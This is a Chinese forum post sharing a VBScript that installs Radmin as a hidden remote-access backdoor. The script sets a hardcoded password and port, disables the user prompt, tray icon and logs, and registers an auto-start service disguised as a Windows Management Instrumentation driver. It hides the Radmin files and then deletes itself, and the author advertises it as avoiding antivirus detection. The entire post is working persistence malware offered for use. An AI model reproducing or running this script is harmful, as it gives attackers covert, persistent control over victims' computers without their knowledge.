Vbs脚本实现radmin终极后门

在网上看到N多人做radmin后门，要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用，希望大家喜欢。 on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv") strKeyPath = "SYSTEM\RAdmin" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0\Server" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0\Server\iplist" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath Set objRegistry = GetObject("Winmgmts:root\default:StdRegProv") strPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary) uBinary = Array(1,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary) uBinary = Array(0,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary) uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)         //此为注册表导出十六进制转为十进制数据 pass:241241241 Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)     //Radmin密码 uBinary = Array(5,4,0,0)       //端口：1029 Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary) uBinary = Array(10,0,0,0) Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary) Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") strKeyPath = "SYSTEM\RAdmin\v2.0\Server\Parameters" strValueName = "LogFilePath" strValue = "c:\logfile.txt" set wshshell=createobject ("wscript.shell") a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%\system32\Exporer.exe start= auto",0) oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer &"\root\default:StdRegProv") strKeyPath = "SYSTEM\ControlSet001\Services\WinManageHelp" strValueName = "Description" strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers." oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "DisplayName" strValue = "Windows Management Instrumentation Player Drivers" oreg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue strValueName = "ImagePath" strValue = "c:\windows\system32\Exporer.exe /service" oreg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue set wshshell=createobject ("wscript.shell") a=wshshell.run ("net start WinManageHelp",0) b=wshshell.run ("attrib +r +h +s %systemroot%\system32\exporer.exe",0) c=wshshell.run ("attrib +r +h +s %systemroot%\system32\AdmDll.dll",0) d=wshshell.run ("attrib +r +h +s %systemroot%\system32\raddrv.dll",0) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)     //自删除   -------   from www.hack58.com